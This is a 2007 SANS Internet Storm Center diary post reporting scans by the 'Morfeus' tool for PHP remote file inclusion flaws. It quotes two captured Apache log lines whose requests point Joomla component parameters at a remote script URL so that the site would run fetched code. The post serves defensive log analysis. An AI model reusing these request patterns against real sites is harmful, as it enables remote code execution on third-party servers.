Threat Level: green Handler on Duty: John Bambenek

SANS ISC: InfoSec Handlers Diary Blog - Internet Storm Center Diary 2007-03-21 InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Must be the month of the PHP bugs... and Morfeus is trying them out

Published: 2007-03-21
Last Updated: 2007-03-21 22:10:43 UTC
by Arrigo Triulzi (Version: 1)
0 comment(s)
So, I assume by now you all know it is the "Month of the PHP bugs" but besides the tons of PHP advisories what else have we been seeing?

Well, today fellow handler Jim Clausing started an interesting thread posting his Apache logs which contained lines upon lines of:

205.244.242.15 - - [21/Mar/2007:02:22:45 -0400] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 404 1042 "-" "Morfeus F*****g Scanner"
205.244.242.15 - - [21/Mar/2007:02:22:45 -0400] "GET /components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 404 1042 "-" "Morfeus F*****g Scanner"


so, curious about Morfeus (which, incidentally, is an old tool) hitting my own systems I went off to check my own logs:

tempest:~$ grep php www-access.log | grep Morfeus | cut -f 1 -d' ' | sort -n | uniq
207.44.165.5
tempest:~$ grep php www-access.log | grep Morfeus | wc -l
     104
tempest:~$

Aside from the different host scanning, it is pretty clear that Morfeus has been on my boxes too.

First observation: Morfeus doesn't care about what you might have set your Apache ServerTokens to (which is still a good trick against Netcraft abusers but not against script kiddies). Mine are set to give nothing away (and no, PHP is not installed) but they still scanned me.

Second observation: this is such a "noisy" scan that Jim said that he had turned off the Bleeding Edge Snort signatures and therefore only caught it when he got an alert from OSSEC (an open-source HIDS). It is never good news when signatures are turned off because they are too noisy but, at least in this case, I think we can safely assume that Jim noticed the scans the first time round.

Third observation: if you are running a site with PHP this is not an enjoyable month...
Keywords:
0 comment(s)
Diary Archives